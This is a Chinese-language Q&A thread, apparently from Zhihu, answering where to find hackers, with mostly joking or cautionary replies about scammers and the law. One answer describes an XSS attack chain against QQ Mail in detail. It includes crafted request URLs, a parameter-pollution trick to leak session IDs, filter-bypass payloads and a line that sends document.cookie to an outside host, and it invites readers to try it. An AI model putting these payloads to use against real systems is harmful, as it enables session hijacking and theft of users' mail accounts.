---

又是釣魚貼。

黑客高手，想找還不容易嘛？

知乎里的TK教主。

微博里的yuange

阿里的豬豬俠 ringzero

知道創宇的heige

360 vulteam的古河

360的MJ

這些都是國內，乃至世界的頂級高手。

想找他們，直接發私信啊，但是你得說明你的來由。

如果是想改個成績、拿回被網賭騙取的錢財、找個欠債的人，那我認為大可不必了。

這些人的薪水都是幾百萬，上千萬的。別拿自己的無知去挑戰別人的下限。

---

叫我幹啥？（手動滑稽）

說實話現在明面上說是黑客的，要麼就是騙子，要麼就是信息安全工程師們用來自黑和開玩笑的，其實一個個都老實的很，不老實的都進去了。《網路安全法》出來後確實是查的很嚴的。

真正的黑客肯定有，但是他們不會向外暴露，所以你也找不到他們，畢竟留下痕迹之後，接踵而來的會是法網恢恢。

---

首先我不知道你要找他們幹嘛，但是你要有一個方向比較研究web的和研究二進位的不一樣就算是研究web的你也要問是哪個方面的是內網還是什麼

單純找可以試著去幾個src平台試著研究一下，如果要是學習技術那麼我建議你自己學畢竟他們一點技術的都不想和你多說話，因為你問的問題就像是一加一 他們懶的回答

---

謝邀。

自古看守所出人才，有個黑客叫王凱倫的，判了五年，是個高手，我掐指一算。

你在等他四年，就能找到他了。

---

目前國內形勢 你找到的百分之九十八都是騙子，如果是正規項目 可以找正規安全公司。

---

別那麼中二，想那麼多了

黑客沒工夫跟你這種小孩子折騰的

你想學技術，最好自己去折騰

折騰的多了，水平就提高了

給你舉個例子吧

之前在QQ郵箱發現一個存儲型self-xss。然後就折騰了下這個漏洞，大致說下挖的過程

一、self-xss

qq郵箱在賬戶設置中因為編輯器原因存在多處XSS，其中昵稱處存在存儲型XSS。

這個地方的XSS其實很多人都挖過，但是TX不收， 遇到這種情況大多數人都是放棄，但是最好不要

因為：只有不努力的黑客，沒有攻不破的系統.png

二、抓包改命

打開BURP，進行抓包，把更改昵稱的包抓下來，發現是POST包，去掉無關參數改成get。

https://mail.qq.com/cgi-bin/setting4_editaccount? sid=g9g7NNlnserJcHAu fun=editalias=6024539%40qq.com acctid=0taskid=0signvalid=1 nickname=%3Cimg+src%3D1.gif+onerror%3Dalert%28"邊界駭客"%29%3E selectSign=-1

從上面get包可以看出nickname為XSS參數，其中sid為關鍵參數，只要獲取到sid就可以惡意構造數據包，誘騙別人點擊從而觸發XSS。

三、坎坷的SID獲取

通過搜索觀察JS等繁瑣操作，發現本地文件上傳會自動獲取到sid值。

嘗試網路圖片，發現網路圖片獲取不到sid值，通過對比分析不斷嘗試，終於發現可以在上傳的時候污染url參數，讓伺服器進行誤判數據包如下：

http://202.182.100.68?http://mail.qq.com/cgi-bin/download? sid=EUpcQayQKHM4MzNt upfile=7ZEaLqhogztd7WCLUL6pFXYarCUpMrqvb9FQGM5%2FLP%2FOd8yiJIFnHJetwNJtTadXhJHD1o%2B%2BzMOXwZGBd45fawmHtqR0CBxF0i35YN7jRAQNg%2B6blIvZyZwWQ4V2GW4RhMuLcCc4uv%FxFICwqvJPiQ%3D%3D

讓伺服器誤判圖片為本地上傳至文件伺服器的，這樣只要別人打開你的郵件就可以獲取到sid值。

四、惡意構造get包，觸發XSS獲取cookie

在構造XSS的時候發現，XSS字元串存在字元限定和觸發過濾限制

4.1字元串長度限制

&<img src=1 onerror=eval(window.parent.location.hash.substr(1))&>

4.2單雙引號限制

eval(String.fromCharCode())

4.3CSP繞過

img=document.createElement(img);img.src=http://image.3001.net/2020/02/eec6417cf66331c0eee621cb445e205d.jpg+escape(document.cookie);document.body.appendChild(img);

這樣就可以完美完成此次的釣魚攻擊了。效果圖如下：

攻擊流程圖：

大致就是下面這些漏洞：

csrf

參數污染

xss

cookie without httponly

get/post濫用

邏輯漏洞

郵件信任機制不嚴格

自動載入js等

對技術感興趣的可以去照著上面說的折騰一下

練的多了，你就會了

---

哈哈哈(?ω?)hiahiahia，只有他找你，不是你找他

---

應該很多地方可以找到，看你想要什麼樣的黑客。

就像你朋友介紹你按摩，你自己肯定是不知道的。

你以為只有市場才有雞，可能是你的見識少而已。

你以為只有超市才有菜，可能你沒見過我的天秀。

你以為黑客是高冷的人，其實人家格子衫帶短髮。

你以為我會告訴你怎找，幫你找也很簡單點個贊。

---

黑客你是找不到的，即便能找到也是騙子。他們一般都非常低調，不會告訴你他是黑客。

---

我一哥們michigan大學畢業，現在好像在facebook做測試運維工程師吧，IT金融 Economic research雙學位學士，這應該稱得上是你們口中所謂的黑闊了吧哈哈哈，twitter和youtube上面應該還有他06左右的賽場記錄。

---

牢里

---

1

---

靠找是沒戲的，就算找到了也不會教你，圈內的人就這毛病，除非你也有兩下子他們才會搭理你跟你探討，只有像我這種弟弟級別的才會跟著回答問題

---

就在這裡。

---

360公司和騰訊公司

---

各大眾測平台

---

為什麼喜歡問這種問題 ，你去找郭盛華 花烏鴉給你解答吧

---

還是算了吧。不用找 有本事的 你這種也不屑於幫你。

---

大學

---

個人建議你別找

去一些專業群，社區都能找人，注意別太直接。即使這樣也不能保證不是騙子，最好別找，會做也不一定給你干。畢竟是在法律邊緣瘋狂試探。

---

推薦閱讀：